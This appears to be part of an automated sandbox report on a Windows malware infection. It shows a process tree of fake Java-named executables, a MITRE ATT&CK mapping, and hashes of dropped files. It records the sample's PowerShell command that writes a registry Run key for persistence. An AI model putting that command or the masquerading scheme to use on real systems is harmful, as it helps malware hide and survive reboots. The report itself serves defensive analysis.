        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        25⤵
        
        PID:5204
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        26⤵
        
        PID:6088
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        27⤵
        
        PID:4856
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        28⤵
        
        PID:2032
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        29⤵
        
        PID:2496
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        30⤵
        
        PID:752
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        31⤵
        
        PID:4760
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        31⤵
        
        PID:4984
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        32⤵
        
        PID:4864
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        33⤵
        
        PID:4268
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        34⤵
        
        PID:2036
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        34⤵
        
        PID:6076
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaupdater_platform.exe"
        35⤵
        Modifies registry key
        
        PID:4488
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaupdater_platform.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe\"'"
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe"
1⤵
PID:5188
- C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
  2⤵
  PID:3704
- - C:\Windows\SysWOW64\reg.exe
    reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaupdater_platform.exe"
    3⤵
    - Modifies registry key
    PID:5156

C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
1⤵
PID:1968

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:6044

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
PID:2972

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\5uMVCoG.exe.log

Filesize
1KB

MD5
fde7cc81ed0c50e7ce18702102f19ace

SHA1
e9f02b348fda9b22bb3999b4ebef4d366f153086

SHA256
00ac4add3fbf73f31bdeb249969dddc68da554c9e9383ec524d63c64dc3f4b53

SHA512
75bf55c4f619948f16e29f51008d026e7789eda82615f566b150d54f5769b64d7fe1a6ff8be458e2630be621c551183dfe272ce0a579024065cbc2b4b26f4bf5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
25604a2821749d30ca35877a7669dff9

SHA1
49c624275363c7b6768452db6868f8100aa967be

SHA256
7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

SHA512
206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\MHD417D2\soft[1]

Filesize
3.0MB

MD5
866664b3ce72c7dad2ffc552282ddd7c

SHA1
43404be154db8ee32dc7c59de01f015235e44de2

SHA256
630af8886f6e7b8cb7b530ed641a4ddf20eec3bedd2a5aa60285b5a5805a603a

SHA512
a0b5eb5438cedaa60b6f23ea9daaa3e71cddfca906f933f3a3a44d04cb63427a1fb6ea4153bf4027d767ef5620ab0e6712257f3ea5e508d74662f1596dfcc712

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\W212EQCE\service[1].htm

Filesize
1B

MD5
cfcd208495d565ef66e7dff9f98764da

SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

SHA512
31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
5fb056309d5bb09bbac1669816978c1f

SHA1
1ec155692dd5301db1c20f63303709365eb449ce

SHA256
a3ac9e2db9214c46509d15a30b1bc1759669be9ae4c527e1f734e73f13a3035c

SHA512
5a8e620d22cdf148ab45d91190662f9bacd12ec4bd9b641b88df21cc4bfe75f081563b90e82172cc5f05012985a411e7de93cb7b283c5739dcae74882c0fa94e

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\0o5pj305.default-release\activity-stream.discovery_stream.json

Filesize
26KB

MD5
9d261fc319f68a65878d240336fe94d4

SHA1
b81358fb4547174052c261d778a42f3ba590e9e3

SHA256
545fa7c5b43936aa85b3b47af5a2b476e1924f2e67bb89c5eb9ee4dd8e3e7e6f

SHA512
114da824ec0133f021cfbedd78959c82e5eddca3c8ac701f2523613d3d27c2070c0195e5b047e45d0a1a8d2e89f12729d2e5965532bb6d1856392478e9937c7a

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\0o5pj305.default-release\cache2\entries\A585344A45AF937E3AB7D706291A9A3ED8D581D9

Filesize
13KB

MD5
90e6aa4865c621474d87f9358bd439d8

SHA1
46c68b8c97588fd9bc73b63410ce533cb1aa407b

SHA256
82bd0bc95129c726a080e84be4e2eec4f4a063adeaeb0b2ef370235e8f4e69ad

SHA512
5e951e8e2346e05cfc7bc7ab8161b1522a916ff21b0baa6a036e8a44082051728c44519fde083c338378ce468a80fa514574caa1c530dece4c5ebabe2ec31995

Download Submit
C:\Users\Admin\AppData\Local\TempOVRQKOFFXAHJW7N9VXFOL7S1SRCJLGHM.EXE

Filesize
1.8MB

MD5
aba42b49897c599236ba483336191696

SHA1
54db5b7baef0974251bef65d57070b7895342582

SHA256
7962be4c49f573f94ab4c4d0dfc039482e2ac69a2c788b955a8f91c9b0b85f2d

SHA512
dd910032c48f03e7ec6aed1c4752ed1f36c3a9e1fbb539f77d381d8d03ac5de0e6ce1bcabd4841af5eaf2109873112319226964c5ede0d55a867790a0435e5d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\04Yw8seDS.hta

Filesize
717B

MD5
3b3383d46449eda1ac434a96f292dc89

SHA1
cfb9ba43dc3338e53d47124518437d375afc3663

SHA256
4807880ba89e3c288b441df0b357419347a12204cc00443d0927eeb791bab8bc

SHA512
e9543426c2e2c347a1ac5f677bf499c3ea1da54256e0714602871c87a5587c0c6b8c55f065d062781adc955ce104858648695c31ce610f554580d1e41bd394a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\10053340101\crypted.exe

Filesize
584KB

MD5
44fd76204dcaf60f12a9067ea19ff727

SHA1
abedd7c76ac3fbe020f3a3c9adac51936d164683

SHA256
09822446e89d4a19fb638ea05fe85eb6f02976aa3db8f85aa1e359a6963cec2a

SHA512
7ced4614615eeee053787c8df8714a5bfe39106f321233de00486c7a671855f45f844bf8b9deb21525fbc3a5a8dfb127ac9b1289cd8db69fd0214a133fe52d95

Download Submit
C:\Users\Admin\AppData\Local\Temp\10475710101\5uMVCoG.exe

Filesize
150KB

MD5
3dd50c0486a8bee19a3b7c230a7537fc

SHA1
8c00b0eba55a110921e02ebf50aa1af29fcad5b7

SHA256
dc39b279146b5278a94e5a8cd857bb51277087d93a990fbf12ba91f88d0e435b

SHA512
6b72c5a7fb7ceeaed9cc4b0da8b0d3186ed5591ab6f54cb1de1fbb3add42b5c25c408991eb28a13d5f48d36e8fa7ed8952e0ea8a3bdb5a25df0b8d9d15ff2139

Download Submit
C:\Users\Admin\AppData\Local\Temp\10477200101\mtCxnCB.exe

Filesize
2.6MB

MD5
ba38bbe814e2c9eb996e26fd32a06c90

SHA1
e38a55849e4343240993fa742cc014b413ceffd8

SHA256
78843066f5ff4c744ed6f349f1401346b820e996aed5ffa4565430c0f3691659

SHA512
f20bb793aefcb38fc955116002fec9d220c92964d41277588503198e2f3f941d0bc1323140f33fed8cd786783b89f538499824fe6f274ab2214cac9aaee80664

Download Submit
C:\Users\Admin\AppData\Local\Temp\10478430101\VrQSuEQ.exe

Filesize
584KB

MD5
6067c3dec335a65c86981cec8c9f50c8

SHA1
135e42bc3fe852fb5cdebb1393faaf8b1d748ee8

SHA256
b8d31a5a73175ca42357eae22a6be78dc542fae0a17ca5b4757f2ab420ee1435

SHA512
8930faaf18465eb0f0d3e5caaad2033ed6a17098be635f47a88f568829356e807bc86b9ae4974329bc1e5f335de237a4871368781078fc51861adbb62fbea9d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\10478590101\b8573833a1.exe

Filesize
956KB

MD5
83457e01fa40348dfee40d4832d2d09a

SHA1
4f4944f5923de6563e702bba00339ac4d2d70292

SHA256
20da0dcdfbe199c63d3ba34bbc08f5a79c8ee28ad1ae069994da6788a2aced3b

SHA512
e1954f4c2896f148df99937e9c59bdeb11dfcc613931423e6ea9d7fb1edbf77c042d32a8d212b9884907321671145b010310b0ca6fea0708feb690a9ff73414f

Download Submit
C:\Users\Admin\AppData\Local\Temp\10478600101\274d8a3c45.exe

Filesize
2.0MB

MD5
d96af155795ad6ad9cc0dcca9e4b974f

SHA1
5b673fd381cf5e5a35806cbe784fd36f943d8046

SHA256
ae346aa326b9a05b8932bf96de56c2f7d1b0d9ebb08c0e3fbbc8f8bfcd3b60f9

SHA512
56a1ff4a9b14e5e67b86632d342ca7abfe075ec0bb1166b5155e896345c4efaa13b82702c7d3877781704b4c852010f4a19fb2da7127d23b269da989026ab8eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\10478610101\8c7784fc03.exe

Filesize
2.3MB

MD5
f38307248547b3bf4d49b0bc6ed24928

SHA1
30f9c6dd54f540e2cad5464ed18a32111427daee

SHA256
4872d57408f37c1fc5887c93e1fb91399e1780ddb128b18b146a3fc426216144

SHA512
54310151955e1be5af000e101d53bb6efa33663d2b08cbb148c8ea9b0dca4255fa2a2b46236b4df28e9da66e96318b2c670bba7d87150584d71c22d026cbc88b

Download Submit
C:\Users\Admin\AppData\Local\Temp\10478620101\eb9dcd3c19.exe

Filesize
945KB

MD5
000468803dae1db13b464756128f4884

SHA1
b955efd12bedb69fc0a3b497fa6eb939385d214f

SHA256
87ad17793bba32ff07424634f93587b63510d3fc8bc678d6cfccb1e36ebf019c

SHA512
7fa1285c59881e839af51e5143dee00179f7a1f8690c90b2ff4d4d8bd6fbccf1bb563a0ccb7fed6286f11461a015af33c7c8b0046882b2f4a6f39fc764b63a96

Download Submit
C:\Users\Admin\AppData\Local\Temp\10478630101\8476304cbc.exe

Filesize
327KB

MD5
af4d2379e28fd1c9d99ab993ed99d345

SHA1
53be762be7859652114bc19510d7828780600c7f

SHA256
502efda7464100a47d48e9fff2812bfee072050135146182390ce1a47ba808c8

SHA512
4f3f703e2b4a7e1ba82390ec3e5f8a5880e7c9998e522bc2a036182d68c43bb3a2797a7295e77be8fb311699259084b67069029201d00736eea9db28a857699e

Download Submit
C:\Users\Admin\AppData\Local\Temp\10478640101\b538167fd6.exe

Filesize
716KB

MD5
57a5e092cf652a8d2579752b0b683f9a

SHA1
6aad447f87ab12c73411dec5f34149034c3027fc

SHA256
29054ff2ce08e589dcc28d1e831f0c99659148f1faaabc81913207c4d12b4a34

SHA512
5759fc4bf73a54899fb060df243cdd1c1629504b20695d7116317a1941ef1f86449c9c3388d5a48bc7e4223207c985eadba1950e15c045d15890423701ba1b1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\10478640101\b538167fd6.exe

Filesize
358KB

MD5
e604fe68e20a0540ee70bb4bd2d897d0

SHA1
00a4d755d8028dbe2867789898b1736f0b17b31c

SHA256
6262dac7e6839a9300b48f50d6d87011fc3e9baae5bbcec14ba00b7a6da6f361

SHA512
996216993cc5e07e73d6b3c6485263537377c6b5af94a8b681216e7c5f8383672408998d4186a73f5fe83d94f48bf0a54d6a7c2ca82d3aa825ade2462db0bd89

Download Submit
C:\Users\Admin\AppData\Local\Temp\10478650101\ff19489656.exe

Filesize
1.4MB

MD5
f3f9535109155498021e63c23197285f

SHA1
cf2198f27d4d8d4857a668fa174d4753e2aa1dca

SHA256
1ec54b5a3d71165f456a6e441bd7d6d85500973f953b9d6388c1c24a35cc449f

SHA512
a05607b2d128055117877682f05b5abf1777addcb79debdac812cbc78cbef56ca87abca463b6fa96679172f580fd1603e7e470b7484248a3cdde0c0bc3124755

Download Submit
C:\Users\Admin\AppData\Local\Temp\10478650101\ff19489656.exe

Filesize
730KB

MD5
31aeed8d880e1c68a97f0d8739a5df8a

SHA1
d6f140d63956bc260639ab3c80f12a0e9b010ee9

SHA256
bc7e489815352f360b6f0c0064e1d305db9150976c4861b19b614be0a5115f97

SHA512
bacbe9af92bf8f2adb7997d6db2f8a8fe833dbcef5af0cc465f6e41c2f409019b740c82f4b587d60ce1446f9cf10ebcb638bdf8d5fe05c7e8e8c518b747b6748

Download Submit
C:\Users\Admin\AppData\Local\Temp\10478660101\7a4616a2d4.exe

Filesize
938KB

MD5
b7430c558badc33b5b014196e0ca7ae9

SHA1
fdc4ee812635e62fbece09d92cbe8e9b5c64be41

SHA256
4fca71c67716c65a8500227d5e3ae2b4488cb85279d386b599005857d1d4ba05

SHA512
82531af4a056288c3ed12f4dec12dad99166b880be526380274ee27882413dfd7cf832c551a0eb6ebf9ea9b7ba1aa224166096834ef51db1a41d0de9ff812512

Download Submit
C:\Users\Admin\AppData\Local\Temp\10478670101\44e43277a9.exe

Filesize
1.8MB

MD5
23daf05873f4cd60e6e0d0e6fed8880d

SHA1
4223e5346802111698d21e47c408316e33954bf3

SHA256
06ee61dc6aa20f62b43412364cbbc83bc1f93e25876cddfa52378b8e10cfd31d

SHA512
d494ec7f759e54cb397cb0e514a7bc58fb78fee68e6ce8e1d79b557711838e559560d1d05c0f32f9d6f0b3b6e102468bb8dbb03cd430cee92f3a3914dae5a713

Download Submit
C:\Users\Admin\AppData\Local\Temp\10478680101\30c4aed2a1.exe

Filesize
4.6MB

MD5
eb07fd4b0236b4c151574d7007c9622a

SHA1
00a074b1f5af6243d3fa4b2cdc8dd264895d8425

SHA256
96000869f2a3b841a56114a5468cabd7d01a7081804c292a10c91e98b3d355d6

SHA512
254af3c9eaa7c0b8a955f62cc00d5b2645042c63621f41ad2a044ecabaa8baad298f546bf8f2d97d573866be03a64a4e4df9b310cac3c2630726605c51b3c0fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\10478690101\12ca9c48e4.exe

Filesize
4.3MB

MD5
b0861a78effb0d7f919e28fd213fcd4b

SHA1
ab3cdac7507a1ec68cccfa9db8e8f029e3533184

SHA256
9ce792acc85321a32ec3becaab555329c7c133c81e1e1cf48a2c2eb5f1faed3d

SHA512
a058f70bfcd591e6c5739e7e1433f0d9eeb7698eccdab9221a72d5d0a5c9d98e4df55c74b938a41a1f943e8acd17ae7567f3b9897ccf55b902eaecc03650f585

Download Submit
C:\Users\Admin\AppData\Local\Temp\10478700101\YMauSAr.exe

Filesize
8.4MB

MD5
4f42e67b18ad32a4ae3662c1aa92534e

SHA1
f9293f44c606ed3d4d5860b68ea77ce04a0a8e98

SHA256
5d037ef54456896a1d51f10a26fd044b8d43075c7793f0b48bea38e3bd5c4e0f

SHA512
67bd00255d8af8ed013657fe3e2e53038c2d976c25eb740bb32bcd50ce78eaac5dcae782995362f6203bf26687d2517c840e7604543130f3652c58673390e38a

Download Submit
C:\Users\Admin\AppData\Local\Temp\10478710101\9sWdA2p.exe

Filesize
1.1MB

MD5
5adca22ead4505f76b50a154b584df03

SHA1
8c7325df64b83926d145f3d36900b415b8c0fa65

SHA256
aa7105a237dc64c8eb179f18d54641e5d7b9ab7da7bf71709a0d773f20154778

SHA512
6192d61e777c59aa80c236b2f3e961795b7ff9971327c4e3270803d356ecf38949811df680a372259a9638ccdb90fc1271fb844f1f35656d5b317c96081f396e

Download Submit
C:\Users\Admin\AppData\Local\Temp\10478720101\fbc2c884ad.exe

Filesize
1.8MB

MD5
5aadea44f3d96c6f05d0419d9897ea73

SHA1
91ee2b28aa0c3e46b0239873e684abe0cdee6b25

SHA256
2fc05d98135d83c7ff8d9dc34931b2b07918dbb7bec09541ee83e4833595f3ff

SHA512
b7d88128e2c9aedbdcabcb492a5a55ecda4b16b7db0f57ea7a125eaec6dbbbdf9d963a1157d490975a18a4363f2501a365f84a4e6862969651df1316b4feff17

Download Submit
C:\Users\Admin\AppData\Local\Temp\10478730101\Rm3cVPI.exe

Filesize
354KB

MD5
27f0df9e1937b002dbd367826c7cfeaf

SHA1
7d66f804665b531746d1a94314b8f78343e3eb4f

SHA256
aff35e23562fc36f4b8f6b5bf95eb5dbf11e8af6674e3212aa0c4077ddfe8209

SHA512
ee4e7e5a8ffe193a8487dd4e9bfb13affa74cacdf250a4e22ed0fc653bbfb615855771dd41d295be905bed311c1690874ce61a5a9d9a5745b4bc550715c7de17

Download Submit
C:\Users\Admin\AppData\Local\Temp\10478741121\ccosvAs.cmd

Filesize
1.4MB

MD5
2f0f5fb7efce1c965ff89e19a9625d60

SHA1
622ff9fe44be78dc07f92160d1341abb8d251ca6

SHA256
426b6e77a4d2e72edf8cd6177578a732ca05510b56cb58d938d6e25820dc2458

SHA512
b8587d32e98693f08c9c3776ac4168204d76dd6db0d76c6afc815d6727d745f6137ae83fe85a7562517b37c320ddebc27167a9f3f14dacca33954dbe437dc920

Download Submit
C:\Users\Admin\AppData\Local\Temp\10478750101\716b865e0f.exe

Filesize
2.0MB

MD5
01b0151651b8bcc89284a793741b28bf

SHA1
ea8231dcb7039e75067d709f7c0dc3e9c7197500

SHA256
aa3b026b91f876bcb4d719bf640b8c8f3da8ca034b7f25a489c289d5c8ce84e3

SHA512
f0e82c817ed456729b0d9346d103c76ce22e3f21f4ff14986feadd9e1a2af70854d1abc4525b9491bfae039e2e75cd463fb38b7c87208de1b5f771af5ac9147b

Download Submit
C:\Users\Admin\AppData\Local\Temp\10478760101\amnew.exe

Filesize
429KB

MD5
22892b8303fa56f4b584a04c09d508d8

SHA1
e1d65daaf338663006014f7d86eea5aebf142134

SHA256
87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f

SHA512
852dcc1470f33bc601a814f61a37c1f5a10071ff3354f101be0ef9aa5ac62b4433a732d02acd4247c2a1819fef9adef7dd6722ee8eb9e8501bac033eb877c744

Download Submit
C:\Users\Admin\AppData\Local\Temp\10478771121\5uMVCoG.cmd

Filesize
420B

MD5
410af9f9883c6c7fa57d5de1d71b4d54

SHA1
028ad738ff369741fa2f0074e49a0d8704521531

SHA256
067b25c7c2e27041dc47a0a4564b56a6bbfdc41e5dd630dbf070fdada4dbff71

SHA512
d25e8a6ec39c67f85835969285a8da4a950444ae75e207a7168ca524a55a8fd7779555e4623723321644571e3ac40df5a8098e6317d8ba60b686cf309b8d3bda

Download Submit
C:\Users\Admin\AppData\Local\Temp\10478780101\qhjMWht.exe

Filesize
5.8MB

MD5
1dbdcaeaac26f7d34e872439997ee68d

SHA1
18c855f60fb83306f23634b10841655fb32a943b

SHA256
3142aecf9794be2f3894d3e1429d28f80918c5b41d516c9160e7cd3984a6f5a3

SHA512
aa447551d1d44d8b615a3d8a656c4085d024cc72fa9ead0b944c72dd7ff5bdab60fd7829440d9c2b4b2de364ca33d349e5716699e2cefd4835e35bbc7e421535

Download Submit
C:\Users\Admin\AppData\Local\Temp\10478790101\larBxd7.exe

Filesize
1.2MB

MD5
4641a0bec2101c82f575862f97be861c

SHA1
0dd1ee06cdb7ba9ef2aa1dc44c80f1bc2586d33b

SHA256
fc2ac17498bd7846607110e66426bdad0ab5302f5c7978dd72c20d99166292e1

SHA512
da87190b368b99feafdb6cfb2fe236c94741573f494ca1cc9127f3a34e9112e1c8d4bf794841b4f00d3f083bc8239226d7d6ffecb45eb02299ff4e03e6e3749a

Download Submit
C:\Users\Admin\AppData\Local\Temp\1A88.tmp\1A89.tmp\1A8A.bat

Filesize
1KB

MD5
e5ddb7a24424818e3b38821cc50ee6fd

SHA1
97931d19f71b62b3c8a2b104886a9f1437e84c48

SHA256
4734305286027757086ef56b9033319ec92c3756e3ca41d7bf22c631d392e1ea

SHA512
450101acf9a4a39990d0cb0863794c0852fdf14f37a577af520fe7793b4ed70b5dd07a74f9fec42d9f762b4f45140eca75442b0ce76585a2c2646af64ffc4d21

Download Submit
C:\Users\Admin\AppData\Local\Temp\272.exe

Filesize
88KB

MD5
89ccc29850f1881f860e9fd846865cad

SHA1
d781641be093f1ea8e3a44de0e8bcc60f3da27d0

SHA256
4d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3

SHA512
0ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cattle.psd.bat

Filesize
11KB

MD5
ec90ed340e87d540b3b2bfd46026424c

SHA1
94d88488e005158000815c918c59e868f221a1c6

SHA256
80f117d62a42a9c74efb37e180cc85796f56e3eedc76c5b8962837fb964f32e0

SHA512
57d231bae221e173fb8707638292ab69fd222760c4da4404dea0c392e442d53f92381ef23608c4e4caa1c779b987e20b98a50d2c2b96c0354fda2700ad6388d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Lueb4sOJD.hta

Filesize
717B

MD5
1623dea5650b87b2d829124f4bc94ed1

SHA1
c8941ab25ce86b3953f3fa5f4e70016e40feba3f

SHA256
749eaa4bc5165c75ae888da181cebcdcf6d098e0dc2d5e838754aaaeb52148c6

SHA512
e2bab781e92f1bfb2fcda93ff5ae4f3cc4214fd68eb89d77eb6eb511a0ad988d1e0d355472b2cf78b308d1bbd9bd84c702d8ed1ed51e078a132986b21f797d03

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eqwogkt2.lzg.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost015.exe

Filesize
2.9MB

MD5
b826dd92d78ea2526e465a34324ebeea

SHA1
bf8a0093acfd2eb93c102e1a5745fb080575372e

SHA256
7824b50acdd144764dac7445a4067b35cf0fef619e451045ab6c1f54f5653a5b

SHA512
1ac4b731b9b31cabf3b1c43aee37206aee5326c8e786abe2ab38e031633b778f97f2d6545cf745c3066f3bd47b7aaf2ded2f9955475428100eaf271dd9aeef17

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
11KB

MD5
25e8156b7f7ca8dad999ee2b93a32b71

SHA1
db587e9e9559b433cee57435cb97a83963659430

SHA256
ddf3ba4e25a622276755133e0cce5605b83719c7cab3546e09acbfed00d6a986

SHA512
1211b2fa997ba13ff926aec58b6b35a81d7fe108b0caa8f4d6369d0a37f8481373b78a4b201651243adde9e2b2699ce929482a46226ff6299b0a0e40fe2ddc56

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
14.0MB

MD5
bcceccab13375513a6e8ab48e7b63496

SHA1
63d8a68cf562424d3fc3be1297d83f8247e24142

SHA256
a6af95a209b2e652ed6766804b9b8ad6b6a68f2c610b8f14713cd40df0d62bf9

SHA512
d94483deaae98bf9212699f1ab0bd913f6151a63e65ebc1ea644ab98d5e3ebd74ecaa08f70aca31e11a5d2c64d1504b723817af35bbe9d7b05c758dd6945d484

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
502KB

MD5
e690f995973164fe425f76589b1be2d9

SHA1
e947c4dad203aab37a003194dddc7980c74fa712

SHA256
87862f4bc8559fbe578389a9501dc01c4c585edb4bb03b238493327296d60171

SHA512
77991110c1d195616e936d27151d02e4d957be6c20a4f3b3511567868b5ddffc6abbfdc668d17672f5d681f12b20237c7905f9b0daaa6d71dcdac4b38f2448b2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0o5pj305.default-release\AlternateServices.bin

Filesize
13KB

MD5
c7b839e5fffad3b7785f65ba2b86f761

SHA1
7c047cc1fcc4fba27a94c777658a0a2771467d76

SHA256
5ae80783b3d528607b97f5d8aa015e26ad096fee589c22754eba63917c295b34

SHA512
d7ea5174b4e1fae4e5f614532d38b6eb43ffe6501174a27f124d955ff9c953d90c4dab832836c10fe5e3e8cf696119c26a252815caf43d70f59e44318c312a01

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0o5pj305.default-release\AlternateServices.bin

Filesize
17KB

MD5
e10ab678f3f7dc4a1d7aa3145d235874

SHA1
bdff847f811d6c392231a4049a1daad9009a2eea

SHA256
6eff36d032b4950addeb0c4bb72b0ba0e73ba0416c7c6338050137a13e61465f

SHA512
fd3e8cf366e68bfc792257c908c58eda0eec5b9a17c189aaea56729139658dbe0f25e7d0c835b645292f966a02ab383950818d5ac75b9abea2134b47382d1922

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0o5pj305.default-release\datareporting\glean\db\data.safe.tmp

Filesize
3KB

MD5
a41cc435733447217c2abe6fc8f480fc

SHA1
299cd3cb78cb93be2c3506f8f14bc94175d3be9b

SHA256
413052e0a635394f49156bf045465da3bf811e4b6a5772b9fcccc60e9d63f4d8

SHA512
2b388236370a3a295668bcf32dddc302706318fad0a2ae9b62192b71496571808e92adece47993c75e3156209d45390455ea4b43a7ab9fd3bf59d0d413b55709

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0o5pj305.default-release\datareporting\glean\db\data.safe.tmp

Filesize
7KB

MD5
a5acf04387eff981aa7b5b677f5bbb9a

SHA1
ff15792c5ef8182fe0c02c097188c19f36ca6740

SHA256
e253f77eb1bca243f75bfea0b69357f282a8b5471f45be4190e485654d2ae4d2

SHA512
cea5a8a2580f9803f29d82f325ca17f302c97101341d19044415fec2aafe842af11c1118682a0ab87f35b28e477d4331dac002ce184256305f18e26b99384211

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0o5pj305.default-release\datareporting\glean\db\data.safe.tmp

Filesize
6KB

MD5
d4d8f62def570dda41d9964e73a9b33f

SHA1
fe8ca89819514c454136bde8bc142c3d80a38524

SHA256
afbfd6cb21dbdceb534a7e53ad6f988f73f56b69707c467223e446bf6fd70907

SHA512
8956051287c6b5c41ffbf91d1ffa144d65e5b5db2d373c5e20ebbdfe467089113a109e333a6e2bee9ae4477e33fd16ed84df8a063627de8605f06ad6c73bc4ee

Download Submit
